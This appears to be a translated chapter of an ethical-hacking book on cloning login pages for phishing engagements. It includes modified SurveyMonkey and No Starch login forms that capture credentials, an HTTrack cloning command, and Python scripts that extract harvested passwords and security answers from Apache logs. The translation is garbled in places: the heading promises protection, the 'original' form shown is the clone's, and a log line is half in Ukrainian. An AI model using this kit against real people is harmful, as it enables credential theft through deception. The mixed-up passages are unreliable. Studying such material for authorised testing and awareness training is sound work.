No. 6. Practical Application Hacking and Social Engineering (Landing Page Cloning)

Landing Page Cloning Protection

Landing page cloning is a dangerous and illegal activity used for fraud, phishing and theft of confidential information. Impersonating the look and feel of a legitimate web page misleads users in order to abuse their trust and obtain sensitive data such as passwords and financial details. Fraudsters use cloned pages that appear authentic and trustworthy to trick users into entering their personal information, creating an almost exact copy of the original page that masquerades as a trusted website. Victims who click the link in your phishing email should land on what looks like a legitimate web page. If your attack reaches this stage, creating a convincing, realistic landing page becomes the most important aspect of the engagement.

Depending on the level of complexity the client requests, this can range from free-site-builder-grade HTML to an almost identical clone of a site the employees visit every day. In this section, we first look at a cloned website to see what changes you need to make to the original site. We then clone two web pages from the No Starch Press website using HTTrack, a Linux command-line tool. You can host the cloned pages on the Apache server you set up in Chapter 7 and link to them in an email sent to your client’s employees.

An example of a cloned site

Let’s take a look at a fake SurveyMonkey site I cloned around 2017. This simple site consists of three pages. First, it prompts victims to fill out a login form. When they click the Submit button, they are taken to a password reset form that asks a few simple questions. On the last page, the user is informed that an error occurred while resetting the account. Let’s look at these pages more closely to understand their structure.

Login page

Figure 8.1 shows the first page named index.html.

Fig. 8.1. The first page of the cloned site (index.html)

An attentive victim might have noticed several signs that give the phish away. There is no green lock icon in the address bar to indicate that HTTPS is in use, because I opened the page directly from the file in my browser without going through Apache. In a real phishing attack, the URL would not be in the legitimate surveymonkey.com/<survey path> format, although SurveyMonkey might be mentioned somewhere in it to fool users. Additionally, SurveyMonkey does not normally show logos on its login page. Otherwise this phish is hard to spot: the correct address is displayed in the browser tab, and hovering over the Sign Up or BBB Accredited Business links shows the real addresses.

Figure 8.2 shows the first page (index.html) of our site, now served over HTTPS without errors. This is the start page we send victims to, where we try to collect their email addresses and passwords before passing them on to questions.html.

Fig. 8.2. HTTPS version of the site (visually absolutely safe)

If you look at the HTML source of this page, you will see that it is almost identical to the code of the original site. You can find the source code of the pages we cloned, as well as Python parsers for the information victims type in, at http://sm-phish.seosint.xyz/.

In index.html, I changed the lines of code that define the login form and its fields, and edited the code so that when users submit the form, they are redirected to questions.html:

<form id="sign_in_form" class="sign-in-form" action="Questions.html" enctype="application/x-www-form-urlencoded" method="get">
<fieldset form="sign_in_form">
<label for="username">Enter your username:</label>
<input id="username" name="username" value="" autocorrect="off" autocapitalize="off" class="notranslate textfield required" maxlength="50" size="20" autofocus="" type="text"><span></span>
<label for="password">Enter your password:</label>
<input id="password" name="password" class="notranslate textfield required" size="20" autocomplete="off" type="password">
<span></span>
<div>
<input id="remember_me" name="remember_me" type="checkbox">
<label class="remember-me" for="remember_me">Remember me!</label>
</div>
&nbsp;<a href="Questions.html">
<button class="translate btn btn-large btn-arrow btn-arrow-right btn-arrow-large-horiz btn-arrow-large-right-dark yellow shadow" type="submit">Sign In <span></span></button></a>
</fieldset>
</form>

I set the action attribute so that the browser goes to the questions.html page when the user submits the form, and defined the HTTP method as get so that the data from each form field is collected. (A full explanation of HTTP methods is beyond the scope of this book, but many resources on the Internet cover the topic.) I then defined the id, the textfield required class and the type attributes of the input fields that are displayed on the victim’s screen.

You should understand that HTTP GET is not a secure method. To prevent an attacker outside the client’s network from taking advantage of the data entered on your page, make sure a firewall is in place and that only your IP addresses and the client’s addresses are allowed through.

However, using the HTTP GET method to capture input has several advantages. It does not require a database, because the data lands directly in the Apache log file at /var/log/apache2/access.log. Additionally, if the target organization monitors its network traffic, it should notice parameters such as password=userdata leaving the page in clear text, which tells the organization that it is under attack.

Transmitting credentials in plain text in URLs or over other insecure channels is a security violation. Some platforms encode this text, which is equally unsafe; even if the code passes a hash as a parameter, an attacker who can intercept the traffic can perform a hash interception (pass-the-hash) attack, stealing the cryptographic representation of the password (the hash) and using it directly to gain access to resources without ever knowing the password.

Although this form looks like a user account login, it is not. It merely captures the input and checks nothing. As long as each field contains at least one character, the user is taken to the next page. If this code were used for real authentication, it would be insecure, because the website would let everyone in.

Attackers can use collected passwords in a variety of attacks. For example, they can use a password in a password-spraying attack, trying it against other accounts associated with the employee and the target organization.

Critical Questions Page

Figure 8.3 shows the second page, which asks users for sensitive information under the guise of restoring their account.

The questions.html page uses the same source code as index.html. Here, I replaced the email address and password form fields with four password reset questions. I also replaced the action that sent users to questions.html with error.html.

Fig. 8.3. The second page of the cloned site (questions.html); the parameters from index.html are passed in the URL

Error page

The last page (Figure 8.4) informs users that an error has occurred.

You can use this last page for various purposes. For example, many victims will wonder why the error occurred and try entering different credentials to get the login to work. Victims may also report the problem to the IT department, which will almost certainly put an end to the attack.

This page’s HTML code contains an infinite loop that causes it to keep reloading. When I wrote this code around 2017, browsers allowed this loop to run forever. Browser versions released after 2020 may stop it after some time.

Collection of information

This loop causes a problem: each iteration writes a line to the log file, which makes it hard to pick out passwords and other sensitive information from the file by hand. Instead, you can use a pair of Python scripts to extract just the information you need. You can find these scripts at http://sm-phish.seosint.xyz.

Fig. 8.4. SurveyMonkey phishing page error screen

In the logs, the raw information for the login transaction contains the following data:

IP Address - - [17/Feb/2021:04:04:12 +0000] "GET /Questions.html?username=Testing_Username&password=password123 HTTP/1.1" 200 11590 "https://IP Address/Index.html" "Mozilla/5.0 (user agent information) (KHTML, like Gecko) (user agent information)"
IP Address - - [17/Feb/2021:04:04:36 +0000] "GET /Error.html?pet=Dee-Oh-Gee&school=Hogwarts&name=Mom&honeymoon=Tatooine HTTP/1.1" 200 12090 "https://IP Address/Questions.html?username=Testing_Username&password=password123" "Mozilla/5.0 (user agent information) (KHTML, like Gecko) (user agent information)"

Each line contains the information submitted by the user: the page on which the data was entered (questions.html or error.html) and each field ID with its value, for example pet=Dee-Oh-Gee.

The data_parser_index.py script will open the log file, find each field we prompted users to enter on the login page, and then output the field values as an array:

#!/usr/bin/env python3
import re

# Match the username and password parameters of a GET request to Questions.html
user_pass = re.compile(r"\S.+username\=(?P<user_name>\S.+)\&(?P<password>\S.+)\sHTTP\S.+")

with open("/var/log/apache2/access.log", "r") as log:
    for l in log:
        u = user_pass.findall(l)
        if u:
            print(u)
        else:
            continue  # lines without a match are skipped

We import Python’s regex module and create a regular expression that extracts the username and password from every line of the log file that matches. After opening the log file, a for loop iterates over each line and prints all matches.

The data_parser_questions.py script performs the same tasks, except that it extracts the data submitted from the questions.html page:

#!/usr/bin/env python3
import re

# Match the four password reset answers sent from questions.html to Error.html
questions = re.compile(r"\S.+pet\=(?P<pet>\S.+)\&school\=(?P<school>\S.+)\&name\=(?P<name>\S.+)\&honeymoon\=(?P<honeymoon>\S.+)\sHTTP\S.+")

with open("/var/log/apache2/access.log", "r") as log:
    for l in log:
        u = questions.findall(l)
        if u:
            print(u)
        else:
            continue  # lines without a match are skipped

After running the scripts over the data, we have the information we need. The data_parser_index.py script gives you the username and password:

root@ossie:~# ./data_parser_index.py
[('Testing_Username', 'password=password123')]

The data_parser_questions.py script gives you the password reset answers from the questions.html page:

root@ossie:~# ./data_parser_questions.py
[('Dee-Oh-Gee', 'Hogwarts', 'Mam', 'Tatooine')]

Website cloning

Now let’s clone a site. For this exercise, you will create a simple but almost identical copy of two No Starch Press web pages. The Apache instance set up in the previous section needs content to display something on the user’s screen; otherwise you are doing nothing but counting clicks.

Finding the login and user profile pages

Suppose you are going to attack a company whose employees, as you know from OSINT, often buy No Starch Press books. To steal their login credentials, copy the nostarch.com login page. Visit the page now, or find it through robots.txt, the file that tells search engine bots what to index and what not to index. We often use this file during OSINT collection to identify directories that cannot be found with conventional search engines.

You may notice that when you click the Login button, you are taken to a new web page: https://nostarch.com/user. Let’s clone both the main site page and the login page.

Clone pages using HTTrack

We will use the HTTrack website copier to clone the pages. This command-line tool comes preinstalled on Kali, but you can install it on any Linux system. For example, use the following command to install it on Ubuntu and Debian:

The tool has several useful options. The --mirror option creates an almost identical copy of a site. The --update option refreshes an existing copy, for example to pick up changes to the underlying code, links, trackers or fields. The --continue option resumes mirroring if the process was interrupted or stopped. The --skeleton option copies only the site’s HTML files. The -O option lets you specify the output directory.

The choice of cloning options depends on the complexity of the site you plan to clone and on how elaborate your phishing engagement needs to be. The larger and more complex the website, the longer it takes to clone, which gives the organization that owns the site more opportunity to catch and block you. If the client does not care how much noise you make, or you want a faithful copy and have plenty of time, do the full mirroring process. Otherwise, downloading only the HTML of the pages is enough. Here we will use the latter option. To clone the No Starch login page, enter the following command: sudo httrack --skeleton https://nostarch.com/user/

Figure 8.5 shows the cloned page. You can view it from the directory in which you ran HTTrack: navigate to the folder named after the domain and then down the directory structure. In this case, you are looking at index.html under nostarch.com.

Fig. 8.5. A copy of the No Starch login page

Compare the clone with the original site (Figure 8.6). The only difference you should notice is the URL.

Fig. 8.6. The actual No Starch login page

Changing the code of the login field

At the moment, submitting any data on the cloned page redirects the user to the real site. You need to change this behavior for the input fields.

First, let’s look at the page’s code. The easiest way is to load the real site and identify the input fields’ code with your browser’s element inspector. To do this, right-click anywhere on the page and select Inspect. Now hover over the input fields, and the code on the right highlights the relevant fragments.

In this case, we are studying the login form. Here is the form code from the original page:

<form id="sign_in_form" class="sign-in-form" action="Questions.html" enctype="application/x-www-form-urlencoded" method="post">
<fieldset form="sign_in_form">
<label for="username">Enter your username:</label>
<input id="username" name="username" value="" autocorrect="off" autocapitalize="off" class="notranslate textfield required" maxlength="50" size="20" autofocus="" type="text"><span></span>
<label for="password">Enter your password:</label>
<input id="password" name="password" class="notranslate textfield required" size="20" autocomplete="off" type="password"><span></span>
<div>
<input id="remember_me" name="remember_me" type="checkbox">
<label class="remember-me" for="remember_me">Remember me!</label>
</div>
&nbsp;<a href="Questions.html"><button class="translate btn btn-large btn-arrow btn-arrow-right btn-arrow-large-horiz btn-arrow-large-right-dark yellow shadow" type="submit">Sign In <span></span></button></a>
</fieldset>
</form>

Like the login form we discussed earlier, this file contains username and password fields, and data capture works the same way.
On closer inspection, you can see that this site uses the HTTP POST method instead of GET, which means this line must be rewritten so that the credentials end up in the URL and therefore in the Apache access log. HTTP POST and HTTP GET are methods of transferring information between client and server. The main difference is that GET passes parameters in the URL, which is less secure than POST, which passes parameters in the message body.

Let’s change the form code so that it uses the GET method and captures the credentials as intended. The file you are looking for is index.html in the nostarch.com/user directory. You can find the relevant code with the element inspector or by downloading and viewing the source manually.

Here is the part of the real code that describes the form (search the source for "form" to find it):

<form action="https://nostarch.com/user/" method="post" id="user-login" accept-charset="UTF-8"><div>
<div class="form-item form-item-openid-identifier form-type-textfield form-group">
<label class="control-label" for="edit-openid-identifier">Log in using OpenID</label>
<input class="form-control form-text" type="text" id="edit-openid-identifier" name="openid_identifier" value="" size="60" maxlength="255" />
<div class="help-block"><a href="https://openid.net/">What is OpenID?</a></div>
</div>
<div class="form-item form-item-name form-type-textfield form-group">
<label class="control-label" for="edit-name">Username or email address <span class="form-required" title="This field is required.">*</span></label>
<input class="form-control form-text required" title="Enter your username or email address." data-toggle="tooltip" type="text" id="edit-name" name="name" value="" size="60" maxlength="60" />
</div>
<div class="form-item form-item-pass form-type-password form-group">
<label class="control-label" for="edit-pass">Password <span class="form-required" title="This field is required.">*</span></label>
<input class="form-control form-text required" title="Enter the password that accompanies your username." data-toggle="tooltip" type="password" id="edit-pass" name="pass" size="60" maxlength="128" />
</div>
<input type="hidden" name="form_build_id" value="form--q4hdYsiZQz_R7O2aCls66if7f2BqLo2k1ZftdGkfs" />
<input type="hidden" name="form_id" value="user_login" />
<input type="hidden" name="openid.return_to" value="https://nostarch.com/openid/authenticate?destination=user" />
<ul class="openid-links"><li class="openid-link"><a href="#openid-login">Log in using OpenID</a></li>
<li class="user-link"><a href="#">Cancel OpenID login</a></li>
</ul>
<div class="form-actions form-wrapper form-group" id="edit-actions"><button type="submit" id="edit-submit" name="op" value="Log in" class="btn btn-primary form-submit icon-before"><span class="icon glyphicon glyphicon-log-in" aria-hidden="true"></span> Log in</button>
</div></div></form>

Now make the following changes (the form action and method, the href links and the hidden openid.return_to value now point to Error.html):

<form action="Error.html" method="get" id="user-login" accept-charset="UTF-8"><div>
<div class="form-item form-item-openid-identifier form-type-textfield form-group">
<label class="control-label" for="edit-openid-identifier">Log in using OpenID</label>
<input class="form-control form-text" type="text" id="edit-openid-identifier" name="openid_identifier" value="" size="60" maxlength="255" />
<div class="help-block"><a href="Error.html">What is OpenID?</a></div>
</div>
<div class="form-item form-item-name form-type-textfield form-group">
<label class="control-label" for="edit-name">Username or email address <span class="form-required" title="This field is required.">*</span></label>
<input class="form-control form-text required" title="Enter your username or email address." data-toggle="tooltip" type="text" id="edit-name" name="name" value="" size="60" maxlength="60" />
</div>
<div class="form-item form-item-pass form-type-password form-group">
<label class="control-label" for="edit-pass">Password <span class="form-required" title="This field is required.">*</span></label>
<input class="form-control form-text required" title="Enter the password that accompanies your username." data-toggle="tooltip" type="password" id="edit-pass" name="pass" size="60" maxlength="128" />
</div>
<input type="hidden" name="form_build_id" value="form--q4hdYsiZQz_R7O2aCls66if7f2BqLo2k1ZftdGkfs" />
<input type="hidden" name="form_id" value="user_login" />
<input type="hidden" name="openid.return_to" value="Error.html" />
<ul class="openid-links"><li class="openid-link"><a href="#openid-login">Log in using OpenID</a></li>
<li class="user-link"><a href="#">Cancel OpenID login</a></li>
</ul>
<div class="form-actions form-wrapper form-group" id="edit-actions"><button type="submit" id="edit-submit" name="op" value="Log in" class="btn btn-primary form-submit icon-before"><span class="icon glyphicon glyphicon-log-in" aria-hidden="true"></span> Log in</button>
</div></div></form>

First, you change the form action and the href links, which redirects traffic from this page to your error.html page. The next fragment of code must also be removed so that your fake page does not redirect the victim to the real site.

You will have to create your own version of the error.html page that this page now links to, but that is easy. Simply copy the existing file and replace the form with a message like the following:

<h5> Sorry, but our site is down for maintenance. Please check back in 24 hours. We apologize for any inconvenience.</h5>

You can find a sample error.html file for the SurveyMonkey page in the GitHub repository (http://sm-phish.seosint.xyz/).

Now test the copy by double-clicking its icon in the file browser or by browsing to the host (Figure 8.7).

Adding web pages to the Apache server

After verifying that the fake page works properly, move your site to the Apache root directory, where the SSL/TLS certificate and the DNS record you configured earlier apply. To do this, move each HTML file to the /var/www/public_html directory. Every connection to the site is recorded in access.log, and that is where you will collect the data provided by victims.

Here is the access.log content for the following event:

IP-адреса - - [17/лютий/2020:04:04:12 +0000] "GET /error.html?openid_identifier=test&name=test&pass=test HTTP/1.1" 200 11590 "https://IP Address/index.html" "Mozilla/5.0 (інформація про агента користувача) (KHTML, як Gecko) (інформація про агента користувача)"

Fig. 8.7. Displaying a custom error message on the No Starch login page clone

We used materials from the book “Social Engineering and Ethical Hacking in Practice”, which was written by Joe Gray.
